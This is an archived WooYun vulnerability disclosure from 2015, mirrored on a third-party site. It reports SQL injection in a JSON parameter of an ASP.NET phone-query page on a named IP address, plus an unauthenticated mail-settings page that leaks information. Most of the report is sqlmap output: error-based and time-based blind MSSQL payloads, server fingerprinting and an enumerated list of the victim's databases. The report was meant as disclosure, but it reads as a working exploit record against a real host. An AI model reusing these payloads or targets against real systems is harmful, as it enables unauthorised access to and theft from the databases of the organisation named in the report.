乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-26: 细节已通知厂商并且等待厂商处理中 2015-07-31: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://119.253.55.28/ui/注入地址:http://119.253.55.28/ui/mail/PhoneQuery/PhoneQuery.aspxJSON
Place: (custom) POSTParameter: JSON #2* Type: error-based Title: Microsoft SQL Server/Sybase error-based - Parameter replace Payload: {"formCodes":[{"orderId":"(CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(122)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (5096=5096) THEN CHAR(49) ELSECHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(98)+CHAR(113))))"}]} Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries) Payload: {"formCodes":[{"orderId":"(SELECT (CASE WHEN (9289=9289) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers ASsys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 9289 END))"}]}---[21:58:25] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5back-end DBMS: Microsoft SQL Server 2008[21:58:25] [INFO] fetching database names[21:58:25] [INFO] the SQL query used returns 12 entries[21:58:25] [INFO] resumed: ACCOUNTING_VJIA[21:58:25] [INFO] resumed: master[21:58:25] [INFO] resumed: model[21:58:25] [INFO] resumed: msdb[21:58:25] [INFO] resumed: QQUnion[21:58:25] [INFO] resumed: SCM_VJIA[21:58:25] [INFO] resumed: tempdb[21:58:25] [INFO] resumed: WMS_VBJH[21:58:25] [INFO] resumed: WMS_VGZ[21:58:25] [INFO] resumed: WMS_VJIA[21:58:25] [INFO] resumed: WMS_VSH[21:58:25] [INFO] resumed: WMS_VNBavailable databases [12]:[*] ACCOUNTING_VJIA[*] master[*] model[*] msdb[*] QQUnion[*] SCM_VJIA[*] tempdb[*] WMS_VBJH[*] WMS_VGZ[*] WMS_VJIA[*] WMS_VNB[*] WMS_VSH
库就不跑了还有一处敏感信息泄露http://119.253.55.28/ui/mail/MailSetting.aspx
都是未授权访问惹的祸
权限 过滤
危害等级:无影响厂商忽略
忽略时间:2015-07-31 22:46
漏洞Rank:15 (WooYun评价)
暂无